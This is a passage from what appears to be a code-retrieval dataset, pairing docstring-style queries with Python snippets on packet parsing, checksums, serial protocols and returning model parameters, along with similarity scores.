0xAA bytes but resync to 0xAA on other\n # unexpected command-reply or indication codes.\n command_byte = bytes([0xAA])\n while command_byte[0] == 0xAA:\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n self._uart.timeout = timeout - now\n command_byte = self._uart.read(size=1)\n if len(command_byte) != 1:\n raise TimeoutError('Waiting for command byte timed out')\n if expected_cmd_reply is not None:\n if command_byte[0] == expected_cmd_reply or command_byte[0] in self._valid_indications:\n got_command = True\n break\n elif (command_byte[0] & 0x7F in self._valid_commands and command_byte[0] & 0x80 == 0x80) or command_byte[0] in self._valid_indications:\n got_command = True\n break\n\n # Get length byte\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n if now >= timeout:\n raise TimeoutError('Waiting for length byte timed out')\n self._uart.timeout = timeout - now\n length_byte = self._uart.read(size=1)\n if len(length_byte) == 0:\n raise TimeoutError('Waiting for length byte timed out')\n\n # Receive remaining bytes\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n if now >= timeout:\n raise TimeoutError('Timeout while reading remaining bytes')\n self._uart.timeout = timeout - now\n bytes_to_read = length_byte[0] + 1\n further_bytes = self._uart.read(bytes_to_read)\n if len(further_bytes) != bytes_to_read:\n raise TimeoutError('Timeout while reading remaining bytes')\n\n # Calculate checksum\n checksum = 0xAA + command_byte[0] + length_byte[0]\n for value in further_bytes:\n checksum += value\n\n # Checksum OK?\n checksum_ok = ((checksum & 0xFF) == 0)\n\n # Return result\n result = command_byte + length_byte + further_bytes[0:-1]\n return (result, command_byte[0] in self._valid_indications)", "async def read_one_message(self):\n if not self.connected:\n return None\n\n try:\n header = await self.reader.readexactly(2)\n except SocketError as err:\n if err.errno == errno.ECONNRESET:\n self.log.error('Connection reset by peer')\n self.connected = False\n if err.errno == errno.EHOSTUNREACH:\n self.log.error('Spa unreachable')\n self.connected = False\n else:\n self.log.error('Spa socket error: {0}'.format(str(err)))\n return None\n except Exception as e:\n self.log.error('Spa read failed: {0}'.format(str(e)))\n return None\n\n if header[0] == M_START:\n # header[1] is size, + checksum + M_END (we already read 2 tho!)\n rlen = header[1]\n else:\n return None\n\n # now get the rest of the data\n try:\n data = await self.reader.readexactly(rlen)\n except Exception as e:\n self.log.errpr('Spa read failed: {0}'.format(str(e)))\n return None\n\n full_data = header + data\n # don't count M_START, M_END or CHKSUM (remember that rlen is 2 short)\n crc = messages.Message.crc(full_data[1:rlen - 1])\n if crc != full_data[-2]:\n self.log.error('Message had bad CRC, discarding')\n return None\n\n # self.log.error('got update: {}'.format(full_data.hex()))\n return full_data", "def run(self):\n\t\twith self.scanner_lock:\n\t\t\tcode = \"\"\n\t\t\tdone_reading = False\n\t\t\twhile not done_reading:\n\t\t\t\t# lsusb -v : find wMaxPacketSize (8 in my case)\n\t\t\t\ttry:\n\t\t\t\t\tdata = self.scanner_endpoint.read(BUFFER_SIZE, timeout=20)\n\t\t\t\t\tif data is 0:\n\t\t\t\t\t\tdone_reading = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tcode += hid2ascii(data)\n\t\t\t\t# try:\n\t\t\t\t# \t# lsusb -v : find wMaxPacketSize (8 in my case)\n\t\t\t\t# \ta = scanner_endpoint.read(64, timeout=2000)\n\t\t\t\texcept usb.core.USBError:\n\t\t\t\t\tdone_reading = True\n\n\t\treturn code", "def parse_packet(packet, recipient_type, pkt_type, exp_src, exp_dst, step):\n\n packet_count = 0\n expected_packet_count = PKT_COUNT\n\n # Calling check_packet helper function to determine how many packets are\n # correctly received. Function returns packet_count\n packet_count = check_packet(\n packet, recipient_type, pkt_type, exp_src, exp_dst)\n\n # Print packet count at each host\n print(\"Packet count at {} was {}\".format(recipient_type, packet_count))\n\n # Store packet_counts in global dict RECEIVED_PKT_DICT\n # Dict needed for ECMP check\n RECEIVED_PKT_DICT[recipient_type] = packet_count", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def next(self):\n if self.done():\n return False\n opcodeArrayRef = opcode.opcodeArray\n\n op = opcodeArrayRef[self.script[self.offset]]\n if op.length == 1:\n # No additional data. Note that some of the opcodes, notably OP_1NEGATE,\n # OP_0, and OP_[1-16] represent the data themselves.\n self.offset += 1\n self.op = op\n self.d = ByteArray(b\"\")\n return True\n elif op.length > 1:\n # Data pushes of specific lengths -- OP_DATA_[1-75].\n script = self.script[self.offset :]\n if len(script) < op.length:\n self.err = DecredError(\n \"opcode %s requires %d bytes, but script only has %d remaining\"\n % (op.name, op.length, len(script))\n )\n return False\n\n # Move the offset forward and set the opcode and data accordingly.\n self.offset += op.length\n self.op = op\n self.d = script[1 : op.length]\n return True\n elif op.length < 0:\n # Data pushes with parsed lengths -- OP_PUSHDATA{1,2,4}.\n script = self.script[self.offset + 1 :]\n if len(script) < -op.length:\n self.err = DecredError(\n \"opcode %s requires %d bytes, but script only has %d remaining\"\n % (op.name, -op.length, len(script))\n )\n return False\n\n # Next -length bytes are little endian length of data.\n if op.length == -1:\n dataLen = script[0]\n elif op.length == -2:\n dataLen = script[:2].unLittle().int()\n elif op.length == -4:\n dataLen = script[:4].unLittle().int()\n else:\n self.err = DecredError(\"invalid opcode length %d\" % op.length)\n return False\n\n # Move to the beginning of the data.\n script = script[-op.length :]\n\n # Disallow entries that do not fit script or were sign extended.\n if dataLen > len(script) or dataLen < 0:\n self.err = DecredError(\n \"opcode %s pushes %d bytes, but script only has %d remaining\"\n % (op.name, dataLen, len(script))\n )\n return False\n\n # Move the offset forward and set the opcode and data accordingly.\n self.offset += 1 - op.length + dataLen\n self.op = op\n self.d = script[:dataLen]\n return True\n\n # The only remaining case is an opcode with length zero which is\n # impossible.\n raise AssertionError(\"unreachable\")", "async def process(self, hdr: PacketHeader, payload: bytes) -> Optional[bytes]:\n # todo scheduled task may be better\n self._result_cache.ageout()\n\n args = payload\n\n # Bad header\n if hdr.is_reply:\n return RPCObjectServer.reply_packet(\n PacketFlags.REPLY, ExecutionStatus.BAD_REQUEST\n )\n\n # Client is ACKing a previous reply.\n # Drop cached reply, if it exists.\n # We don't care about the invocation semantics because it doesn't really matter.\n if hdr.flags & PacketFlags.ACK_REPLY:\n tid = hdr.trans_num.value\n self._result_cache.pop(tid, None)\n return\n\n try:\n if hdr.semantics is InvocationSemantics.AT_LEAST_ONCE:\n res = await self._call_alo(hdr.method_ordinal.value, args)\n return RPCObjectServer.reply_packet(\n hdr, PacketFlags.REPLY, ExecutionStatus.OK, res\n )\n else:\n res, cached = await self._call_amo(\n hdr.trans_num.value, hdr.method_ordinal.value, args\n )\n\n status = ExecutionStatus.OK\n if isinstance(res, Exception):\n if isinstance(res, exceptions.RPCError):\n status = exception_to_estatus(type(res))\n else:\n status = ExecutionStatus.INTERNAL_FAILURE\n res = b\"\"\n\n return RPCObjectServer.reply_packet(\n hdr,\n PacketFlags.REPLY\n | (PacketFlags.REPLAYED if cached else PacketFlags.NONE),\n status,\n res,\n )\n except exceptions.RPCError as e:\n status = exception_to_estatus(type(e))\n except Exception:\n status = ExecutionStatus.INTERNAL_FAILURE\n\n return RPCObjectServer.reply_packet(hdr, PacketFlags.REPLY, status)", "def receiveCallback(self, socket, stateMask):\n # read the PDU header\n pduHeader = self.recv(EGSE.EDENPDU.PDU_HEADER_BYTE_SIZE)\n if pduHeader == None:\n # failure handling was done automatically by derived logic\n return\n # consistency check\n pduHeaderLen = len(pduHeader)\n if pduHeaderLen != EGSE.EDENPDU.PDU_HEADER_BYTE_SIZE:\n LOG_ERROR(\"Read of PDU header failed: invalid size: \" + str(pduHeaderLen))\n self.disconnectClient()\n return\n pdu = EGSE.EDENPDU.PDU(pduHeader)\n # read the data field for the PDU\n dataFieldLength = pdu.dataFieldLength\n if dataFieldLength > 0:\n dataField = self.recv(dataFieldLength)\n if dataField == None:\n # failure handling was done automatically by derived logic\n return\n # consistency check\n remainingSizeRead = len(dataField)\n if remainingSizeRead != dataFieldLength:\n LOG_ERROR(\"Read of remaining PDU failed: invalid remaining size: \" + str(remainingSizeRead))\n self.disconnectClient()\n return\n pdu.setDataField(dataField)\n # dispatch depending on pduType and subType\n try:\n if pdu.pduType == EGSE.EDENPDU.PDU_TYPE_TC:\n if pdu.subType == EGSE.EDENPDU.SUB_TYPE_SPACE:\n # (TC,SPACE)\n LOG_INFO(\"EDEN.Server.receiveCallback(TC,SPACE)\")\n tcSpacePDU = EGSE.EDENPDU.TCspace(pdu.buffer)\n if self.notifyTcSpace(tcSpacePDU.getCCSDSpacket()):\n # forwarding OK\n self.sendTc_eSpace(tcSpacePDU, 0)\n self.sendTc_aSpace(0, tcSpacePDU.tcIdentificationWord)\n else:\n # forwarding failed\n self.sendTc_eSpace(tcSpacePDU, 1)\n self.sendTc_aSpace(1, tcSpacePDU.tcIdentificationWord)\n elif pdu.subType == EGSE.EDENPDU.SUB_TYPE_SCOE:\n # (TC,SCOE)\n LOG_INFO(\"EDEN.Server.receiveCallback(TC,SCOE)\")\n tcScoePDU = EGSE.EDENPDU.TCscoe(pdu.buffer)\n if self.notifyTcScoe(tcScoePDU.getCCSDSpacket()):\n # forwarding OK\n self.sendTc_eScoe(tcScoePDU, 0)\n self.sendTc_aScoe(0, tcScoePDU.tcIdentificationWord)\n else:\n # forwarding failed\n self.sendTc_eScoe(tcScoePDU, 1)\n self.sendTc_aScoe(1, tcScoePDU.tcIdentificationWord)\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid subType: \" + str(pdu.subType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n elif pdu.pduType == EGSE.EDENPDU.PDU_TYPE_CMD:\n if pdu.subType == EGSE.EDENPDU.SUB_TYPE_EXEC:\n # (CMD,EXEC)\n LOG_INFO(\"EDEN.Server.receiveCallback(CMD,EXEC)\")\n self.notifyCmdExec(pdu.getDataField().tostring())\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid subType: \" + str(pdu.subType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n else:\n LOG_ERROR(\"Read of PDU header failed: invalid pduType: \" + str(pdu.pduType))\n LOG(\"PDU = \" + str(pdu))\n self.disconnectClient()\n except Exception as ex:\n LOG_ERROR(\"Processing of received PDU failed: \" + str(ex))\n self.disconnectClient()", "def process_frame():\n return \"OK\"", "def calc_checksum(self):\n total = 0\n packet = ipv4(self.bytes)\n packet.checksum = 0\n bytes = packet.bytes\n if len(bytes) % 2 == 1:\n bytes += \"\\0\"\n for i in range(len(bytes)/2):\n total += (struct.unpack(\"!H\", bytes[2*i:2*i+2])[0])\n total = (total >> 16) + (total & 0xffff)\n total += total >> 16\n return ~total", "def _decode(self):\n \n self.version = int(data_to_hex_str(self.packet[0])[2])\n self.header_len = int(data_to_hex_str(self.packet[0])[3]) * 4\n self.type_of_service = data_to_hex_str(self.packet[1:2])\n self.total_len = int(data_to_hex_str(self.packet[2:4]), 16)\n self.id = data_to_hex_str(self.packet[4:6])\n \n #parse the flags fields(reservedbit, don't fragment, more fragment)\n if ((ord(self.packet[6]) & (1 << 7)) != 0):\n self.flags_reservedbit = 1\n else:\n self.flags_reservedbit = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 6)) != 0):\n self.flags_dont_fragment = 1\n else:\n self.flags_dont_fragment = 0\n #endof if\n \n if ((ord(self.packet[6]) & (1 << 5)) != 0):\n self.flags_more_fragment = 1\n else:\n self.flags_more_fragment = 0\n #endof if\n \n #parse the offset field(in packet[6:7]): 00011111 & packet[6] (to filter flags) -->> get packet[6:7] in hex_str\n #tmp = str(31 & ord(self.packet[6]))\n self.fragment_offset = int(data_to_hex_str(self.packet[6:8]), 16)\n if (self.fragment_offset >= (1 << 13)):\n #take away the flags fields: 00011111 11111111 & self.fragment_offset\n self.fragment_offset = self.fragment_offset & ((1 << 13) - 1) \n \n self.TTL = ord(self.packet[8])\n self.protocol = IPPROTO[ord(self.packet[9])]\n self.header_checksum = data_to_hex_str(self.packet[10:12])\n \n self.src = str(ord(self.packet[12])) + '.' + str(ord(self.packet[13])) + '.' + \\\n str(ord(self.packet[14])) + '.' + str(ord(self.packet[15]))\n self.dst = str(ord(self.packet[16])) + '.' + str(ord(self.packet[17])) + '.' + \\\n str(ord(self.packet[18])) + '.' + str(ord(self.packet[19]))\n \n if (self.header_len > 20):\n self.opt_paddings = self.packet[20 : (self.header_len)]", "def __checksum_make(self, data):\n self.logger.info(\"{}: building the checksum for bytes {}.\".format(self.sensor_name, \":\".join(\"%02x\" % b for b in data)))\n\n if len(data) not in (self.__CommandLength - 2, self.__ResponseLength - 2):\n raise ValueError(\"{}: length data has to be {} or {}.\".format(self.sensor_name, self.__CommandLength - 2, self.__ResponseLength))\n\n if data[0] != self.__SerialStart:\n raise ValueError(\"{}: data is missing the start byte.\".format(self.sensor_name))\n\n if data[1] not in (self.__SendByte, self.__ResponseByte, self.__ReceiveByte):\n raise ValueError(\"{}: data is missing SendByte, ReceiveByte or ReceiveValue-Byte\".format(self.sensor_name))\n\n if data[1] != self.__ReceiveByte and data[2] not in command.values():\n raise ValueError(\"{}: the data command byte value \\\"{}\\\" is not valid.\".format(self.sensor_name, data[2]))\n\n # Build checksum for data to send or receive\n checksum = 0\n for i in range(2, len(data)):\n checksum = checksum + data[i]\n checksum = checksum % 256\n\n self.logger.info(\"{}: checksum calculated {} for bytes {}.\".format(self.sensor_name, \"%02x\" % checksum, \":\".join(\"%02x\" % b for b in data)))\n return checksum", "def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None", "def recv(self) -> tuple:\n (data, c) = self.socket.recvfrom(Rudp.Packet.buffer())\n # print(data)\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity):\n print(\"Valid Packet Received From: \", c)\n else:\n raise Rudp.InvalidPacket(\"Invalid Packet Received\")\n\n return (packet, validity, c)", "def parseCommand(self, msg):\n if msg == \"\":\n return\n if self.interpreter.debug:\n print \"Modem::parseCommand: \", msg\n if(self.status == Modem.Status.KILL):\n return\n command = msg.split(Interpreter.SEPARATOR)\n if (len(command)==1):\n if (command[0] == 'OK'):\n return self.confirmedMyIstr()\n elif (len(command)==2):\n if (command[0] == 'error'):\n return self.error(int(command[1]))\n elif (len(command)==3):\n if (command[0] == 'send_file'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n elif (command[0] == 'send_stream'):\n cmd2 = re.sub(\"[^0-9]\", \"\", command[2])\n return self.recvDataFile(command[1],int(cmd2),False)\n return self.reset_myself()", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def handle_packet(self, packet, ip_proto=None):\n logger.info('Packet data - [%s]', packet.summary())\n return False", "def respond(self):\n\n if not self.board.board:\n hand_data = HandEvaluator.evaluate_preflop_hand(self.hand)\n elif self.board:\n hand_data = HandEvaluator.evaluate_hand(self.board.cards + list(self.hand))\n if len(self.board.board) == 3:\n return Check()\n elif len(self.board.board) == 4:\n return Check()\n elif len(self.board.board) == 5:\n return Check()\n \n # always return Check() as last resort, because it beats Fold()\n return Check()", "def reader(self):\n while self.alive:\n try:\n data = self.serial.read_until(b'~')[:-1]\n packet = ethernet.Ethernet(data)\n if packet[icmp.ICMP]:\n packet[ethernet.Ethernet].dst_s = \"dc:a6:32:00:a7:8b\"\n packet[ip.IP].dst_s = \"192.168.1.35\"\n packet[icmp.ICMP].sum = b'0x1783'\n print(\"\\n\\n__________________RESPONSE FROM VISIBLE PI__________________\")\n print(packet)\n if data:\n self.write(packet.bin())\n except socket.error as msg:\n break\n self.alive = False" ]
[ "0.5792792", "0.56804043", "0.5637224", "0.55658627", "0.5561786", "0.5408823", "0.53773457", "0.5322868", "0.5277083", "0.52678686", "0.52137786", "0.5208731", "0.51964766", "0.5184436", "0.51623356", "0.5156039", "0.51016897", "0.51004124", "0.50996864", "0.508539", "0.5084296", "0.5061333", "0.5051528", "0.50316834", "0.5030048", "0.5013841", "0.49835753", "0.4948625", "0.4934323", "0.49079862", "0.48898607", "0.4884699", "0.48780736", "0.4872789", "0.48727885", "0.48725367", "0.48655856", "0.4850961", "0.4846056", "0.48396713", "0.48343945", "0.48329267", "0.4828932", "0.4828932", "0.4826175", "0.4825916", "0.4820336", "0.48165053", "0.48085216", "0.47929054", "0.4786804", "0.47770074", "0.47710106", "0.47695637", "0.47535884", "0.47506315", "0.47442436", "0.4740757", "0.4735184", "0.47319987", "0.4727423", "0.472101", "0.4719311", "0.4707356", "0.47040352", "0.4697282", "0.46947488", "0.46946377", "0.4689225", "0.46882492", "0.46832222", "0.46788907", "0.4665144", "0.46651354", "0.4661338", "0.46583548", "0.46493092", "0.4645533", "0.46450523", "0.4643488", "0.46321276", "0.46168327", "0.46153858", "0.4613266", "0.46105587", "0.46047434", "0.4602617", "0.4599137", "0.4596063", "0.4593857", "0.45932138", "0.45921555", "0.45900294", "0.45885938", "0.45885423", "0.4587354", "0.45845202", "0.45809093", "0.4578839", "0.45774344" ]
0.6739887
0
Returns the parameters of the visualizer.
def parameters(self): return self._params
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parameters(self):\n return self.pars", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P}", "def parameters(self):\n return self.vars", "def show_parameters(self):\n with np.printoptions(precision=3, suppress=True):\n print('number of wind phase = {}'.format(self.ncomp))\n print('galactic parameter = {}'.format(self.scaling_field))\n print('reference height = {}'.format(self.z0))\n for p in ['cool_params','hot_params','params','ref_params','scaling_params']:\n params = getattr(self,p)\n print(p)\n for k,v in params.items():\n print(' {} = {}'.format(k,v))", "def paramDetails(cls):\n return {\n 'dim': (10, 20, 2, 20),\n 'nIter': (1, 10, 2, 5),\n 'lamb': (.1, 1., .1, .05),\n 'alph': (30, 50, 5, 40)\n }", "def get_params(self):\n return {\n \"nspecies\": self.nspecies,\n \"lmax\": self.lmax,\n \"nmax\": self.nmax,\n \"rcut\": self.rcut,\n \"sigma\": self.sigma,\n \"trans_width\": self.trans_width\n }", "def params(self):\n return {'cfg': self.cfg,\n 'momentum': self.momentum,\n 'center': self.center,\n 'scale': self.scale,\n 'epsilon': self.epsilon,\n 'act_fn': self.act_fn}", "def getParameters(self): #$NON-NLS-1$\r", "def _pprint_params(self):\n return {'x_range': self.x_range, 'y_range': self.y_range,\n 'step': self.step, 'shape': self.shape,\n 'type': self.type}", "def parameters(self):\n return {\"P\": self.P,\n \"T\": self.T}", "def parameters(self):", "def parameters(self):\n pass", "def parameters(self):\n return self.model.parameters()", "def parameters(self):\n return self._params", "def params(self):\n return self._pars", "def getParameters(self):\n return {'channels':self._channels, 'means':self._means, 'stds':self._stds}", "def getParams(self):\n\n\t\tparams = {\"Nparticles\":self.__Nparticles,\"Nkicks\":self.__Nkicks,\"kappa\":self.__kappa, \"eta\":self.__eta,\"gamma\":self.__gamma, \"omega\":self.__omega,\n\t\t\"Kbt\":self.__Kbt, \"tk\":self.__tk}\n\n\t\treturn params", "def getParams(self):\n return self.W, self.b", "def parameters(self):\n #print \"in instrument.parameter()\"\n return self._params", "def vwraysParameters(self):\n return self.__vwraysParameters", "def params(self):\n return {'shape': self.shape,\n 'name': self.name}", "def getParameters(self):\n\n current_params = {'taux': self.taux, 'mu': self.mu, 'G': self.G, 'alpha_0': self.alpha_0,\n 'delta': self.delta, 'p': self.p, 'I0': self.I0, 'kparam': self.kparam}\n\n return (current_params)", "def get_params(self):\n return self.w, self.b", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def parameters(self):\n return self._parameters", "def get_params(self):", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def get_parameters(self):\n return self.parameters", "def parameters(self):\n return []", "def get_params(self):\n pass", "def display_layer_parameters(self):\n pprint.pprint(vars(self))\n return", "def get_params_info(cls):\n return dict(\n config='laygo configuration dictionary.',\n threshold='transistor threshold flavor.',\n draw_boundaries='True to draw boundaries.',\n num_blk='number of driver segments.',\n show_pins='True to draw pin geometries.',\n )", "def _get_params(self):\r\n return np.hstack((self.varianceU,self.varianceY, self.lengthscaleU,self.lengthscaleY))", "def _get_params(self):\r\n return np.hstack((self.varianceU,self.varianceY, self.lengthscaleU,self.lengthscaleY))", "def getParams(self):\n return self.trainError, self.trainAcc, self.w", "def get_params(self) -> np.array:\n pass", "def get_params(self):\n return {'k': self.k, 'q': self.q, 'sigma_s': self.sigma_s, 'm': self.m}", "def params(self):\n\t\treturn self.params_", "def output_parameters(self):\n output_params = get_data_node(\n 'parameter',\n dict={\n 'stress': self.vasprun_obj.ionic_steps[-1]['stress'],\n 'efermi': self.vasprun_obj.efermi,\n 'energy': self.vasprun_obj.final_energy\n })\n return output_params", "def get_visual_properties(self) -> dict:\n return self._vis_properties", "def displayData(cls):\n return (\n \"paramName\",\n \"autoFollow\",\n \"lowerDisplay\",\n \"upperDisplay\",\n \"binCount\",\n \"xscale\",\n \"yweight\"\n )", "def _get_params(self):\r\n return self.k._get_params()", "def parameters(self):\n return self.trainer_parameters", "def parameters(self):\n return self.trainer_parameters", "def get_params(self):\n raise NotImplementedError", "def get_params(self):\n return self.params", "def get_params(self):\n return self.params", "def get_params(self):\n return self.params", "def parameters(self):\n return {\n 'base':self.base.parameters(),\n 'material':[m.parameters() for m in self.material],\n 'fraction':self.fraction,\n }", "def parameters(self):\n return self._loaded_and_cached(gdxcc.GMS_DT_PAR)", "def parameters(self):\n res = dict()\n res[\"population_size\"] = self.population_size\n res[\"mutation_prob\"] = self.mutation_prob\n res[\"crossover\"] = self.crossover\n res[\"selection\"] = self.selection\n res[\"sigma\"] = self.sigma\n res[\"crossover_method\"] = self.crossover_method\n res[\"selection_method\"] = self.selection_method\n res[\"best_rate\"] = self.best_rate\n res[\"n_parents\"] = self.n_parents\n res[\"model_parameters\"] = self.model.total_parameters()\n res[\"IDCT_from\"] = self.IDCT_from\n res[\"elitism\"] = self.elitism\n return res", "def parameters(self):\n\n return self._parameters", "def getInitParams(self):\n paramDict = super().getInitParams()\n paramDict[f'OutStream Available {self.dim}D :'] = self.availableOutStreamTypes[self.dim]\n paramDict['Plot is '] = str(self.dim) + 'D'\n for index in range(len(self.sourceName)):\n paramDict['Source Name ' + str(index) + ' :'] = self.sourceName[index]\n\n return paramDict", "def get_params (self):\n return self.params", "def get_params (self):\n return self.params", "def display_sim_parameters(self):\n pprint.pprint(vars(self))\n return", "def get_parameters(self):\n params = {\"train_frac\": self.train_frac, \"split_alg\": self.split_alg,\n \"nw_name\": self._nw_name, \"split_id\": self.split_id}\n return params", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P,\n \"Wo\": self.Wo,\n \"To\": self.To,\n \"Po\": self.Po}", "def print_params(self):\n s = self._list_params()+\"\\n\"\n if 'scale_params' in self.__dict__.keys():\n s += self.scale_params._list_params()+\"\\n\"\n if 'atmospheric_params' in self.__dict__.keys():\n if self.atmospheric_params is not None:\n s += self.atmospheric_params._list_params()+\"\\n\"\n\n if 'atemperature_params' in self.__dict__.keys():\n if self.atemperature_params is not None:\n s += self.atemperature_params._list_params()+\"\\n\"\n\n if 'oceanic_params' in self.__dict__.keys():\n if self.oceanic_params is not None:\n s += self.oceanic_params._list_params()+\"\\n\"\n\n if 'ground_params' in self.__dict__.keys():\n if self.ground_params is not None:\n s += self.ground_params._list_params()+\"\\n\"\n\n if 'gotemperature_params' in self.__dict__.keys():\n if self.gotemperature_params is not None:\n s += self.gotemperature_params._list_params() + \"\\n\"\n\n print(\"Qgs v0.2.8 parameters summary\")\n print(\"=============================\\n\")\n print(s)", "def params(self):\n return {'kernel_size': self.kernel_size,\n 'stride': self.stride,\n 'n_kernel': self.n_kernel,\n 'padding': self.padding,\n 'act_fn': self.act_fn,\n 'w_init_fn': self.w_init_fn,\n 'resize': self.resize,\n 'use_bias': self.use_bias,\n 'atrous': self.atrous,\n 'idx': self.idx}", "def get_params(self):\n return self.arr", "def getInitParams(self):\n paramDict = super().getInitParams()\n paramDict['method'] = self.method\n paramDict['dimension'] = self.dimension\n paramDict['rank'] = self.rank\n paramDict['mu'] = self.mu\n paramDict['covariance'] = self.covariance\n return paramDict", "def get_params(self):\n return {\"d\": \"155\"}", "def params(self):\n return self._params", "def params(self):\n return self._params", "def params(self):\n return self._params", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def prms(widget: QWidget) -> List:\n parameters = BaseTrain.prms(widget)\n return parameters", "def attributes(self):\n params = self.model.param_array\n return {'parameters': params}", "def parameters(self) -> dict:\n return self._config.get('parameters', dict())", "def _get_parameters(self) -> list:\n return self.parameters", "def parameters(self) -> Dict[str, str]:\n return self._parameters", "def params(self):\n return {'out_dim': self.out_dim,\n 'act_fn': self.act_fn,\n 'use_bias': self.use_bias,\n 'idx': self.idx}", "def lattice_parameters(self):\n return self.a, self.b, self.c, self.alpha, self.beta, self.gamma", "def parameters(self) -> ReportParameters:\n return self.__parameters", "def get_parameters(self):\n d = Algorithm.get_parameters(self)\n d.update({\n 'M': d.pop('population_size', self.population_size),\n 'num_tests': self.num_tests,\n 'num_searches': self.num_searches,\n 'num_searches_best': self.num_searches_best,\n 'bonus1': self.bonus1,\n 'bonus2': self.bonus2,\n 'num_enabled': self.num_enabled,\n 'local_searches': self.local_searches\n })\n return d", "def init_params(self):\n self.params = Parameters()\n self.params.add('qoff', self.qoff, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('yscale', self.yscale, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('int_bg', self.int_bg, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('Rc', self.Rc, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('sur_den', self.sur_den, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)\n self.params.add('ion_depth', self.ion_depth, vary=0, min=0, max=np.inf, expr=None, brute_step=0.1)", "def accepted_params(self):\n return self.ptm.current_luiti_visualiser_env[\"additional_task_parameters\"]", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def _get_params(self):\r\n return np.hstack((self.variance, self.lengthscale))", "def get_params(self):\n\n params={'f_star':self.get_f_star(), 'g_star':self.get_g_star(), \n 'Delta2_star':self.get_Delta2_star(), \n 'n_star':self.get_n_star(), 'alpha_star':self.get_alpha_star()}\n\n return params", "def get_object_params(self):\n return self.mass, self.x, self.y", "def getParameters(self):\n params = []\n for m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n # we do not get param of output module\n l = list(m.parameters())\n params.extend(l)\n\n one_dim = [p.view(p.numel()) for p in params]\n params = F.torch.cat(one_dim)\n return params", "def getParameters(self):\n params = []\n for m in [self.ix, self.ih, self.fx, self.fh, self.ox, self.oh, self.ux, self.uh]:\n # we do not get param of output module\n l = list(m.parameters())\n params.extend(l)\n\n one_dim = [p.view(p.numel()) for p in params]\n params = F.torch.cat(one_dim)\n return params", "def parameters(self):\n if self.state is not None:\n return self.state.tensors()\n else:\n return []", "def params(self):\n return {'kernel_size': self.kernel_size,\n 'stride': self.stride,\n 'n_kernel': self.n_kernel,\n 'padding': self.padding,\n 'act_fn': self.act_fn,\n 'output_shape': self.output_shape,\n 'w_init_fn': self.w_init_fn,\n 'use_bias': self.use_bias,\n 'idx': self.idx}", "def parameters(self):\n params = dict()\n try:\n params['voltage'] = self.voltage()\n params['output'] = self.output()\n return params\n except:\n return \"Disconnected\"", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale))", "def printParameters(self):\n 